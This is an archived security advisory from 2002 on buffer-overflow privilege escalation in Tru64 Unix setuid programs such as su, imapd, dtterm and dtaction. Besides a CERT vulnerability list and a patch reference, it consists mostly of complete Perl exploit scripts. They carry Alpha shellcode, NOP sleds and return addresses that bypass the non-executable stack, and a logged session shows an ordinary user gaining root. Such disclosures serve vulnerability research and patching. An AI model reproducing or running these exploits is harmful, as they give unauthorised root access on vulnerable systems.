Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5666.htm

Tru64 Unix /bin/su exploit



3rd Sep 2002 [SBWID-5666]
COMMAND

	
		Tru64 Unix, dgUX local and  remote  exploits  with  bypass  of  non-exec
		stack
	
	

SYSTEMS AFFECTED

	
		 Tru64 5.1

		 Tru64 5.1A

		 DgUX 4.0
	
	

PROBLEM

	
		Kf <dotslash@snosoft.com> writes:
		

		Just so Compaq does not flip out and try to sue us... it has come to  my
		attention that someone with access to our lab  has  leaked  one  of  the
		exploits for TRU64. We employ people from the general  public  from  all
		over the world for our development so we have  not  yet  pinpointed  how
		the code was "lifted" as many people have access to our lab. This  issue
		was already passed on to the public in September of 2001 and an  exploit
		was ALREADY published by k2 of ADM...so I don't  see  this  as  any  big
		surprise  short  of  the  fact  that  ours  will  bypass  the   non-exec
		stack...just                 a                 heads                 up.
		http://packetstorm.linuxsecurity.com/0101-exploits/tru-64.su.c   >   >is
		the code that was released  last  year...  This  is  the  code  that  we
		created to exploit /bin/su... I believe this is what was leaked.
		

		

		 >#!/usr/bin/perl -w

		 >#

		 ># xxxxx (xxxxx@snosoft.com) - 30/05/2002

		 >#

		 >

		 >($offset) = @ARGV,$offset || ($offset = 0);

		 >$ret_addr = pack("ll",(0x40010250+$offset),0x1);

		 >

		 >$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";

		 >$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";

		 >$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";

		 >$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";

		 >$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";

		 >$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";

		 >$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";

		 >$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";

		 >$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";

		 >$sc .= "x20x35x60x42xffxffxffxff";

		 >

		 >$buf_a  = "A"x8233;

		 >$buf_a .= $ret_addr;

		 >

		 >$buf_b  = pack("l",0x47ff041f)x3750;

		 >$buf_b .= $sc;

		 >

		 >exec("/usr/bin/su",$buf_a,$buf_b,0);

		 >

		

		

		-Also-
		

		On the non-exec stack bypassing, Ian A. Finlay of CERT (R)  Coordination
		Center proposed to KF the revised  alert  titles  that  get  covered  by
		"master vul" tracking number VU#193347 :
		

		

		VU#158499 - csh vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#510235 - dtsession vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#846307 - dxsysinfo vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#671627 - dxchpwd vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#836275 - dtaction vulnerable to buffer overflow via long string of characters supplied as "-contextDir" command line argument

		VU#600699 - dtprintinfo vulnerable to buffer overflow via long string of characters supplied as "-p" command line argument

		VU#320067 - dtterm vulnerable to heap overflow via long string of characters supplied as "-tn" command line argument

		VU#931579 - dxterm vulnerable to heap overflow via long string of characters supplied as "-customization" command line argument

		VU#193347 - Compaq Tru64 non-executeable stack contains buffer overflow in SIA libraries

		VU#435611 - /usr/bin/at command vulnerable to buffer overflow via long string of characters supplied as command line argument

		VU#202939 - dtterm vulnerable to buffer overflow via long string of characters supplied as "DISPLAY" environment variable

		VU#693803 - dxpause contains buffer overflow in _XKB_CHARSET library

		VU#569987 - dxconsole contains buffer overflow in _XKB_CHARSET library

		VU#584243 - dtsession contains buffer overflow in _XKB_CHARSET library

		VU#567963 - imapd vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#592515 - inc vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#448987 - uucp vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#437899 - uux vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#531355 - rdist vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#416427 - deliver vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable

		VU#177067 - Compaq Tru64 "/usr/bin/passwd" vulnerable to buffer overflow via long string of characters

		VU#864083 - Compaq Tru64 "/bin/chsh" vulnerable to buffer overflow via long string of characters

		VU#137555 - chfn vulnerable to buffer overflow via long string of character supplied as command line argument

		

		

		

		 Update (09 September 2002)

		 ======

		

		In Snosoft  formal  disclosure  titled  "Strategic  Reconnaissance  Team
		Security Advisory(SRT2002-09)" :
		

		--snipp--
		

		Here is a quick look at how one of these issues  can  be  exploited.  It
		should be fairly self explanatory.
		

		% uname -a

		OSF1 alpha.snosoft.com V5.1 732 alpha

		% id

		uid=208(stripey) gid=15(users)

		% ls -la /usr/sbin/imapd

		-rws--x--x   1 root     bin       789216 Aug 24  2000 /usr/sbin/imapd

		% perl -e'$ENV{"NLSPATH"}=("A"x1024)."x01x02x03x04x05";exec("/usr/sbin/imapd")'

		Segmentation fault

		% su 

		Password:

		# cp /usr/sbin/imapd test

		# chmod a+r test

		# exit

		% perl -e'$ENV{"NLSPATH"}=("A"x1024)."x01x02x03x04x05";exec("dbx","./test")'

		(dbx) r

		signal Segmentation fault at 

		warning: PC value 0x504030200 not valid, trying RA

		warning: RA value 0x504030200 not valid, trying text start

		warning: text start 0x120000000 not valid, trying data start

		warning: Using data start as a text address -- traceback will not work

		> [., 0x140000000]      call_pal cflush

		(dbx) 0x140014280/2X

		0x0000000140014280:  0x4141414141414141 0x4141414141414141

		(dbx) q

		% perl -e'$ENV{"NLSPATH"}=(pack("l",0x47ff041f)x227).(`./sc`).pack("ll",0x40014280,0x1);exec("/usr/sbin/imapd")'

		# id

		uid=208(stripey) gid=15(users) euid=0(root)

		# 

		

		

		--snapp--
		

		 Update (16 september 2002)

		 ======

		

		Snosoft has released exploits ...
		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 _XKB_CHARSET 

		#

		# stripey (stripey@snosoft.com) - 10/07/2002

		#                                  

		

		$tgts{"0"} = pack("l",0x40010250).":/usr/bin/X11/dxconsole:uid=root";

		$tgts{"1"} = pack("l",0x40012584).":/usr/bin/X11/dxpause:uid=root";

		$tgts{"2"} = pack("l",0x400101e4).":/usr/dt/bin/dtsession:euid=root";

		                                   

		unless (($target,$offset,$align) = @ARGV,$align) {            

		                                   

		        print "-"x72;

		        print "\n      Tru64 _XKB_CHARSET overflow, stripey\@snosoft.com, 03/07/2002\n";

		        print "-"x72;

		        print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";

		                                   

		        foreach $key (sort(keys %tgts)) {

		                ($a,$b,$c) = split(/\:/,$tgts{"$key"});

		                print "\t$key. $b ( $c )\n";

		        }

		        

		        print "\n";

		        exit 1;

		}              

		

		($a,$b) = split(/\:/,$tgts{"$target"});

		                                   

		print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";

		                                   

		$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);               

		                                   

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";

		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";                

		                                   

		$buf_a  = "A"x256;

		$buf_a .= $ret;

		 

		$buf_b  = "B"x$align;

		if ($target eq "2" ) {      

		        $buf_b .= pack("l",0x47ff041f)x56;

		} else { 

		        $buf_b .= pack("l",0x47ff041f)x3750;

		}

		$buf_b .= $sc;                         

		     

		$ENV{"_XKB_CHARSET"} = $buf_a;

		$ENV{"HOME"} = $buf_b;        

		                     

		exec("$b");           

		

		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 /usr/bin/su

		#

		# stripey (stripey@snosoft.com) - 30/05/2002

		#

		

		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 0; }

		

		$ret_addr = pack("ll",(0x40010250+$offset),0x1);

		

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";

		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

		

		$buf_a  = "A"x8233;

		$buf_a .= $ret_addr;

		

		$buf_b  = "B"x$align;

		$buf_b .= pack("l",0x47ff041f)x3750;

		$buf_b .= $sc;

		

		exec("/usr/bin/su",$buf_a,$buf_b,0);

		

		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 NLSPATH

		#

		# stripey (stripey@snosoft.com) - 03/07/2002

		#

		

		$tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";

		$tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";

		$tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";

		$tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";

		$tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";

		$tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";

		$tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid \$DISPLAY";

		$tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid \$DISPLAY";

		$tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";

		$tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";

		$tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";

		

		unless (($target,$offset,$align) = @ARGV,$align) {

		

		        print "-"x72;

		        print "\n        Tru64 NLSPATH overflow, stripey\@snosoft.com, 03/07/2002\n";

		        print "-"x72;

		        print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";

		

		        foreach $key (sort(keys %tgts)) {

		                ($a,$b,$c) = split(/\:/,$tgts{"$key"});

		                print "\t$key. $b ( $c )\n";

		        }

		

		        print "\n";

		        exit 1;

		}

		

		($a,$b) = split(/\:/,$tgts{"$target"});

		

		print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";

		

		$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);

		

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";

		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

		

		$tlen = (1024-(length($sc)))/4;

		

		$buf .= "B"x$align;

		$buf .= pack("l",0x47ff041f)x($tlen-1);

		$buf .= $sc;

		$buf .= $ret;

		

		$ENV{"NLSPATH"} = $buf;

		

		if ($target eq 8) { print "Hit ctrl-d...\n"; }

		

		if ($target eq 3) {

		

		        $buf_b  = "AA";

		        $buf_b .= pack("l",0x47ff041f)x512;

		        $buf_b .= $sc;

		

		        open(OH,">.mh_profile");

		        print OH "Path: $buf_b\n";

		        close(OH);

		}

		

		if ($target eq "4") {

		

		        $buf_b  = "AA";

		        $buf_b .= pack("l",0x47ff041f)x2000;

		        $buf_b .= $sc;

		

		        open(OH,">.mh_profile");

		        print OH "Path: $buf_b\n";

		        close(OH);

		}

		

		if ($target eq 2) {

		

		        exec("$b","-d","a=asdf","-c","/tmp/","\'\$\{a\}\'");

		

		}

		if ($target eq 0) {

		

		        $buf_b = "B"x30000;

		        exec("$b","-g","-dt",$buf_b);

		

		}

		

		exec("$b");

		

		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 /usr/bin/X11/dxterm

		#

		# stripey (stripey@snosoft.com) - 03/07/2002

		#

		

		($offset) = @ARGV,$offset || ($offset = 0);

		

		$ret_addr = pack("ll",(0x4001c828+$offset),0x1);

		

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";

		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

		

		$buf_a .= pack("l",0x47ff041f)x2048;

		$buf_a .= $sc;

		$buf_a .= $ret_addr;

		

		exec("/usr/bin/X11/dxterm","-customization",$buf_a);

		

		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 /usr/dt/bin/dtterm

		#

		# Shellcode modified to exec /tmp/sh instead of /bin/sh...

		#

		# stripey (stripey@snosoft.com) - 30/05/2002

		#

		

		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 3; }

		

		$ret_addr = pack("ll",(0x4001720c+$offset),0x1);

		

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x6d\x70\x7f\x26";

		$sc .= "\x2f\x74\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42xff\xff\xff\xff";

		

		$buf_a  = "A"x8203;

		$buf_a .= $ret_addr;

		

		$buf_b  = "B"x$align;

		$buf_b .= pack("l",0x47ff041f)x1024;

		$buf_b .= $sc;

		

		exec("/usr/dt/bin/dtterm","-tn",$buf_a,"-e","\"$buf_b\"",0);

		

		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 /ust/dt/bin/dtprintinfo

		#

		# stripey (stripey@snosoft.com) - 01/06/2002

		#

		

		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 1; }

		

		$ret_addr = pack("ll",(0x40033610+$offset),0x1);

		

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";

		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

		

		$buf_a  = "A"x2048;

		$buf_a .= $ret_addr;

		

		$buf_b  = "B"x$align;

		$buf_b .= pack("l",0x47ff041f)x1024;

		$buf_b .= $sc;

		

		$ENV{"LANG"} = $buf_a;

		

		exec("/usr/dt/bin/dtprintinfo","-p",$buf_b,0);

		

		

		

		#!/usr/bin/perl -w

		#

		# Tru64 5.1 /usr/dt/bin/dtaction

		#

		# stripey (stripey@snosoft.com) - 01/06/2002

		#

		

		unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 0; }

		

		$ret_addr = pack("ll",(0x40016810+$offset),0x1);

		

		$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";

		$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";

		$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";

		$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";

		$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";

		$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";

		$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";

		$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";

		$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";

		$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

		

		$buf_a  = "A"x2048;

		$buf_a .= $ret_addr;

		

		$buf_b  = "B"x$align;

		$buf_b .= pack("l",0x47ff041f)x2221;

		$buf_b .= $sc;

		

		$ENV{"LANG"} = $buf_a;

		

		exec("/usr/dt/bin/dtaction","-contextDir",$buf_b,0);

		
	
	

SOLUTION

	
		HP/Compaq has provided the following advisory and patches:
		

		HP Advisory Ref: SSRT2257

		http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH